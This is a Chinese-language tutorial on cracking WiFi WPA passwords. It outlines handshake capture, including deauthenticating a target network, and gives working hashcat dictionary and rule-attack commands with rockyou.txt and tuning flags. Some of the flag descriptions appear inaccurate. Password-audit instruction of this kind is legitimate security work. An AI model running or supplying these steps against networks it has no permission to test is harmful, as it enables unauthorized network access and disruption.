(tip:本文所有操作在个人测试环境下运行,请不要用于违法行为)
准备工具:
电脑
kali-linux-2025.2系统(4G内存以上)
----在aircrack爆破时,无线网络审计套件(aircrack-ng)作为内置模组组件常用于一体化流程爆破密码,但由于其早期主要以来于CPU以及对GPU优化性能不佳,在和专业密码恢复工具:哈希爆破器(hashcat)破解速度上差距显著.因此在最后的wifi爆破密码中,使用hashcat为更优解.
一.监听抓包过程:
这里省略,网上教程很多,在成功抓包以后即可进行下面流程...
简单来说有四步:
1.开启wlan监听模式
2.扫描周边wifi
3.监听目标wifi
4.发送解除认证数据包让目标断网从而暴露握手包
二.转换cap包格式:
1.打开https://hashcat.net/cap2hashcat/页面
2.将握手包转换为.hc22000文件
三.hashcat爆破:
1.字典攻击:(基础)
hashcat -m 22000 -a 0 wifi.hc22000 ./wordlist.txt
-m 22000:指定哈希类型为WPA-PMKID-PBKDF2
-a 0:使用预定义的单词列表尝试爆破密码
wifi.hc22000:要爆破的哈希文件
./wordlist.txt;你指定的字典文件(比如著名的rockyou.txt)
2.字典+规则攻击:(推荐)
hashcat -m 22000 -a 0 wifi.hc22000 ./wordlist.txt -r ./best64.rule
./best64.rule:指定的规则文件
(如果要用规则攻击的话,指定攻击模式(-a)一定要是0或9,不然不能运行!)
实战测试:
hashcat -m 22000 -a 0 wifi.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
编辑
这里能否破解要看电脑性能、wifi密码强度和字典质量等多方面因素:)
代码优化方面:
-O:启用内核优化模式
-w:工作负载调优
-K:内存加速(不稳定,我这个版本好像不支持,要根据具体情况来选择)
-U:内核循环次数(不推荐,适合详细了解哈希算法后的微操)
示例:一个微调后的优化指令
hashcat -m 22000 -a 0 -O -w 4 wifi.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule